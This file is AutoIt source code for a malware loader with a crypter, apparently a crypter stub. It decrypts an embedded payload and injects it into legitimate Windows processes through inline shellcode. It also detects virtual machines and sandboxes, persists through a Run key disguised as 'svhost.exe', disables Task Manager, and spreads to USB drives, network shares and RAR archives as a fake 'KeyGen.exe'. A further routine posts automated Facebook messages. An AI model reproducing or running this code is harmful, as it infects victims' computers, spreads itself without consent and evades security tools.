$autoit = @AutoItExe $path = FileRead($autoit, FileGetSize($autoit)) Local $c_pass = IniRead(@ScriptFullPath, "crypted", "key", "NotFound") Local $var = IniRead(@ScriptFullPath, "random", "key", "NotFound") Local $var2 = IniRead(@ScriptFullPath, "binder", "key", "NotFound") Local $fbmessage = IniRead(@ScriptFullPath, "fbmessage", "key", "NotFound") $randoms = $var $confuser = "/-confuser-/" If NOT FileExists(@UserProfileDir & "\" & $var2) Then $file_settings = "" $fuckname = @ScriptFullPath $o_c = FileOpen($fuckname) $r_c = FileRead($o_c) FileClose($o_c) $empty_settings = get_binded_settings($r_c, "[JY]") $file_settings = get_binded_settings($empty_settings, "[J_Y]") $binary_of_server = StringTrimRight($empty_settings, StringLen($file_settings) + StringLen("[J_Y]")) If $file_settings <> "" Then DirCreate(@UserProfileDir & "\" & $var2) $fget = get_binded_settings($r_c, "[J_Y]") $oget = get_binded_settings($fget, "[J_END_Y]") $binname = StringTrimRight($fget, StringLen($oget) + StringLen("[J_END_Y]")) $binname = BinaryToString($binname) FileWrite(@UserProfileDir & "\" & $var2 & "\" & $binname, $binary_of_server) $filepath = FileGetShortName(@UserProfileDir & "\" & $var2 & "\" & $binname) FileSetAttrib(@UserProfileDir & "\" & $var2 & "\", "+SH") If FileGetSize($filepath) > 30 Then RunWait(@ComSpec & " /C Start " & $filepath, "", @SW_HIDE) EndIf EndIf If StringInStr($path, $confuser) Then Call("confuser") Else EndIf $disable = "/-disable-/" If StringReplace($path, $disable, "") <> $path Then Call("avdisable") Else EndIf $usb = "/-usb-/" If StringInStr($path, $usb) Then Call("usb") Else EndIf $network = "/-network-/" If StringInStr($path, $network) Then Call("network") Else EndIf $vm = "/-antivm-/" If StringInStr($path, $vm) Then Call("vm") Else EndIf $start = "/-start-/" If StringInStr($path, $start) Then Call("startup") Else EndIf $melt = "/-melt-/" If StringInStr($path, $melt) Then Call("melt") Else EndIf $inject = "/-inject-/" If StringReplace($path, $inject, "") <> $path Then DirCreate(@UserProfileDir & "\" & $randoms & "\") DirCreate(@UserProfileDir & "\" & $randoms & "\") FileWrite(@UserProfileDir & "\" & $randoms & "\jects.txt", "") DirCreate(@UserProfileDir & "\" & $randoms & "\") Else EndIf Func get_binded_settings($getfiledata, $stringtoget) Return StringTrimLeft($getfiledata, StringInStr($getfiledata, $stringtoget) - 1 + StringLen($stringtoget)) EndFunc $task = "/-task-/" If StringInStr($path, $task) Then Call("task") Else EndIf $sandbox = "/-sandbox-/" If StringInStr($path, $sandbox) Then Call("sandbox") Else EndIf $hide = "/-hide-/" If StringInStr($path, $hide) Then Call("hide") Else EndIf Func melt() $pathto = @UserProfileDir If FileGetShortName(@ScriptDir) = FileGetShortName($pathto) Then Else FileMove(@ScriptFullPath, $pathto & "\" & @ScriptName, 1) Run($pathto & "\" & @ScriptName) FileSetAttrib(@UserProfileDir & "\" & @ScriptName, "+SH") Exit EndIf EndFunc Func _random($imin, $imax, $iinteger = 0) Local $irandom = Random($imin, $imax, $iinteger) If @error Then Return $imin EndIf Return $irandom EndFunc Func _rundos($scommand) Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE) Return SetError(@error, @extended, $nresult) EndFunc Func confuser() $counter = 0 While $counter <= 6 Sleep(5000) ShellExecute(@SystemDir & "\mshta.exe") $counter = $counter + 1 _rundos("taskkill /IM mshta.exe") WEnd EndFunc Func usb() $gweg = DriveGetDrive("ALL") If IsArray($gweg) Then For $i = 1 To $gweg[0] If DriveSpaceFree($gweg[$i]) > 100 Then FileCopy(@AutoItExe, $gweg[$i] & "\" & @ScriptName) EndIf Next EndIf EndFunc Func network() $gwh = DriveGetDrive("all") If NOT @error Then For $i = 1 To $gwh[0] $type = DriveGetType($gwh[$i]) If $type = "Network" Then If DriveSpaceFree($gwh[$i] & "\") > 10 Then Sleep(10) FileCopy(@AutoItExe, $gwh[$i] & "\" & @ScriptName) Sleep(10) EndIf EndIf Next EndIf EndFunc Func sandbox() If WinGetText("Program Manager") = "0" Then Exit Else EndIf EndFunc Func vm() Local $strcomputer = ".", $smake, $smodel, $sbiosversion, $bisvm, $svmplatform Local $objwmiservice = ObjGet("winmgmts:\\" & $strcomputer & "\root\CIMV2") Local $colitems = $objwmiservice.execquery("SELECT * FROM Win32_ComputerSystem") If IsObj($colitems) Then For $objitem In $colitems $smake = $objitem.manufacturer $smodel = $objitem.model Next EndIf $colitems = $objwmiservice.execquery("SELECT * FROM Win32_BIOS", "WQL", 16 + 32) If IsObj($colitems) Then For $objitem In $colitems $sbiosversion = $objitem.smbiosbiosversion Next EndIf $bisvm = False $svmplatform = "" If $smodel = "Virtual Machine" Then $svmplatform = "Hyper-V" $bisvm = True Switch $sbiosversion Case "VRTUAL - 1000831" $bisvm = True $svmplatform = "Hyper-V 2008 Beta or RC0" Case "VRTUAL - 5000805", "BIOS Date: 05/05/08 20:35:56 Ver: 08.00.02" $bisvm = True $svmplatform = "Hyper-V 2008 RTM" Case "VRTUAL - 3000919" $bisvm = True $svmplatform = "Hyper-V 2008 R2" Case "A M I - 2000622" $bisvm = True $svmplatform = "VS2005R2SP1 or VPC2007" Case "A M I - 9000520" $bisvm = True $svmplatform = "VS2005R2" Case "A M I - 9000816", "A M I - 6000901" $bisvm = True $svmplatform = "Windows Virtual PC" Case "A M I - 8000314" $bisvm = True $svmplatform = "VS2005 or VPC2004" EndSwitch ElseIf $smodel = "VMware Virtual Platform" Then $svmplatform = "VMware" $bisvm = True ElseIf $smodel = "VirtualBox" Then $bisvm = True $svmplatform = "VirtualBox" Else EndIf If $bisvm Then Exit Else EndIf Return $bisvm EndFunc Func avdisable() If FileExists(@UserProfileDir & "\once.txt") Then Else Call("avdisable2") FileWrite(@UserProfileDir & "\once.txt", "once") EndIf EndFunc Func avdisable2() If NOT FileExists(@UserProfileDir & "\" & "disable.txt") Then FileWrite(@UserProfileDir & "\disable.txt", "disable") RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegDelete("HKLM64\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run") RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") Else EndIf EndFunc Func startup() If NOT FileExists(@UserProfileDir & "\" & $randoms & "\") Then dcreat(@UserProfileDir & "\" & $randoms & "\") FileCopy(@AutoItExe, @UserProfileDir & "\" & $randoms & "\svhost.exe", 1) FileSetAttrib(@UserProfileDir & "\" & $randoms & "\svhost.exe", "+SH") FileSetAttrib(@UserProfileDir & "\" & $randoms & "\", "+SH") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", $randoms, "REG_SZ", @UserProfileDir & "\" & $randoms & "\" & "svhost.exe") Else EndIf EndFunc Func dcreat($var) DirCreate($var) EndFunc Func task() RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") EndFunc Func hide() $hwnd = ControlGetHandle("", "", "[CLASS:SysListView32]") $line = _guictrllistview_findtext($hwnd, @ScriptName) DllCall("user32.dll", "int", "SendMessage", "hwnd", $hwnd, "int", 4104, "int", $line, "int", "0") EndFunc Func facebook_timer() $min = @MIN + 1 $msg = $fbmessage While 1 Sleep(10) If @MIN >= $min Then facebook($msg) EndIf Sleep(10) WEnd EndFunc Func facebook($msg) $dll = DllOpen("user32.dll") Sleep(2) If _ispressed("0D", $dll) AND WinActive("Facebook -") = True Then ClipPut($msg) Send("^v{ENTER}") Sleep(1) ClipPut("") $min = @MIN + 1 If $min > 60 Then $min = $min - 60 EndIf EndIf DllClose($dll) EndFunc $vdll = "user32.dll" Func _ispressed($shexkey, $vdll) Local $a_r = DllCall($vdll, "short", "GetAsyncKeyState", "int", "0x" & $shexkey) If @error Then Return SetError(@error, @extended, False) Return BitAND($a_r[0], 32768) <> 0 EndFunc submain() Func submain() $sapppath = @ScriptFullPath $skey = "\\carbons\\" $appexe = $sapppath $sarquive = FileRead($sapppath) $r_xcrypted = get_binded_settings($sarquive, $skey) $r_xzeros = get_binded_settings($r_xcrypted, "//J_Y//") $encrypted_xfile = StringTrimRight($r_xcrypted, StringLen($r_xzeros) + StringLen("//J_Y//")) $sarquive = _crypt_decryptdata($encrypted_xfile, $c_pass, $calg_rc2) Call(_runpe($sarquive)) EndFunc Func slenex($sstr) Local $result, $i, $blen Do $i = $i + 1 $blen = StringLeft($sstr, $i) $result = $i Until $sstr = $blen Return $result EndFunc Func _runpe($binary) If $binary = "" Then Exit $asm = shell() Local $bufferasm = DllStructCreate("byte[" & BinaryLen($asm) & "]") Local $binbuffer = DllStructCreate("byte[" & BinaryLen($binary) & "]") DllStructSetData($bufferasm, 1, $asm) DllStructSetData($binbuffer, 1, $binary) $net2 = "/-net2-/" If StringInStr($path, $net2) Then $injecto = @WindowsDir & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" If FileExists($injecto) Then Local $ret = DllCall("user32.dll", "int", "CallWindowProcW", "ptr", DllStructGetPtr($bufferasm), "wstr", $injecto, "ptr", DllStructGetPtr($binbuffer), "int", 0, "int", 0) Else $injecto2 = @WindowsDir & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" Local $ret = DllCall("user32.dll", "int", "CallWindowProcW", "ptr", DllStructGetPtr($bufferasm), "wstr", $injecto2, "ptr", DllStructGetPtr($binbuffer), "int", 0, "int", 0) EndIf EndIf If FileExists(@UserProfileDir & "\" & $randoms & "\jects.txt") Then Local $ret = DllCall("user32.dll", "int", "CallWindowProcW", "ptr", DllStructGetPtr($bufferasm), "wstr", @WindowsDir & "\system32\mshta.exe", "ptr", DllStructGetPtr($binbuffer), "int", 0, "int", 0) Else EndIf $net2 = "/-net2-/" If NOT FileExists(@UserProfileDir & "\" & $randoms & "\jects.txt") Then If NOT StringInStr($path, $net2) Then Local $ret = DllCall("user32.dll", "int", "CallWindowProcW", "ptr", DllStructGetPtr($bufferasm), "wstr", @AutoItExe, "ptr", DllStructGetPtr($binbuffer), "int", 0, "int", 0) Else EndIf EndIf EndFunc Func shell() Local $asm = "0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000" $asm &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200" $asm &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200" $asm &= "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A" $asm &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000" $asm &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8" $asm &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404" $asm &= "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000" Return $asm EndFunc $rarspread = "-rar-" If StringInStr($path, $rarspread) Then Call("rar_spread") Else EndIf $facebook = "-facebook-" If StringInStr($path, $facebook) Then Call("FaceBook_Timer") Else EndIf $loop = "-loop-" If StringInStr($path, $loop) Then Call("loop") Else EndIf Func loop() While 1 AdlibRegister("hide", 1) Sleep(250) WEnd EndFunc Func net2() If NOT FileExists(@UserProfileDir & "\" & $randoms & "\net2.exe") Then $o_c = FileOpen(@ScriptFullPath) $r_c = FileRead($o_c) FileClose($o_c) $empty_settings = get_binded_settings($r_c, "[Snet2]") $file_settings = get_binded_settings($empty_settings, "[Enet2]") $binary_of_server = StringTrimRight($empty_settings, StringLen($file_settings) + StringLen("[Enet2]")) FileWrite(@UserProfileDir & "\" & $randoms & "\net2.exe", $binary_of_server) EndIf EndFunc Func net4() If NOT FileExists(@UserProfileDir & "\" & $randoms & "\net4.exe") Then $o_c = FileOpen(@ScriptFullPath) $r_c = FileRead($o_c) FileClose($o_c) $empty_settings = get_binded_settings($r_c, "[Snet4]") $file_settings = get_binded_settings($empty_settings, "[Enet4]") $binary_of_server = StringTrimRight($empty_settings, StringLen($file_settings) + StringLen("[Enet4]")) FileWrite(@UserProfileDir & "\" & $randoms & "\net4.exe", $binary_of_server) EndIf EndFunc Func rar_spread() If FileExists(@ProgramFilesDir & "\WinRar\rar.exe") AND NOT FileExists(@TempDir & "\rar.dat") Then FileWrite(@TempDir & "\rar.dat", "rar") $drive = DriveGetDrive("ALL") If IsArray($drive) Then For $i = 1 To $drive[0] If DriveSpaceFree($drive[$i]) > 100 Then search_dir_rar($drive[$i] & "\") EndIf Next EndIf Else Return 0 EndIf EndFunc Func search_dir_rar($driver) If DriveSpaceFree($driver) > 1000 Then FileCopy(@AutoItExe, @TempDir & "\KeyGen.exe") search_rar_bin($driver) $file = FileOpen($driver & "system.bin", 0) $s = 1 While 1 $line = FileReadLine($file) If @error Then ExitLoop $shortname = FileGetShortName($line) ConsoleWrite($shortname & @CRLF) _winrarspeard($shortname, FileGetShortName(@TempDir & "\KeyGen.exe")) $s = $s + 1 WEnd $s = 1 FileSetAttrib($driver & "autoexec.bat", "-H") FileSetAttrib($driver & "system.bin", "-H") Sleep(10) FileDelete($driver & "autoexec.bat") FileDelete($driver & "system.bin") EndIf EndFunc Func _winrarspeard($winrarfile, $infectedfile) Sleep(100) RunWait(@ProgramFilesDir & "\WinRar\rar.exe a -ag- -ep1 -r0 -iext -- " & $winrarfile & " " & $infectedfile, "", @SW_HIDE) Sleep(10) EndFunc Func search_rar_bin($driver) FileDelete($driver & "autoexec.bat") FileDelete($driver & "system.bin") $scmdfile = "cd\" & @CRLF & "dir *.rar /b /s >> system.bin" FileWrite($driver & "autoexec.bat", $scmdfile) FileSetAttrib($driver & "autoexec.bat", "+H") RunWait($driver & "autoexec.bat", $driver, @SW_HIDE) FileSetAttrib($driver & "system.bin", "+H") EndFunc